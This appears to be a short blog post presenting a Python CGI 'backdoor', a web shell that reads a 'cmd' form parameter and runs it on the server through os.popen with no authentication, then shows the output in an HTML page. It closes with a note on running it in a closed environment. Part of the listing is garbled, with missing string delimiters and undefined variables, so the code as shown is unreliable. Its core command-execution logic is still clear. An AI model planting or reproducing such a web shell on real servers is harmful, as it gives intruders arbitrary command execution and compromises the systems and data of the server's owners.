#!/usr/bin/env python
# Info  : Linux based CGI backdoor with python
# author: otoy
# date  : 0x102010
import cgi,os,re,sys
form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)
dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]
osinf = os.uname()
       CGI python backdoor
Author : otoy
Date   : 0x102010
Blog   : <a href="https://otoyrood.wordpress.com" target="_blak">otoyrood.wordpress.com</a>
System : %s %s
''' %(osinf[0], osinf[2])
print "Content-type: text/html"
    <title>CGI python backdoor</title>
    <form action='%s'>
       Command <input type='text' name='cmd' />
    <input type='submit' />
""" %(info,progfl,osexe.read())

in action :

PS: if you wanna try this code in your closed environment, you can read this link or this one, it will show you how to run CGI module on your apache server.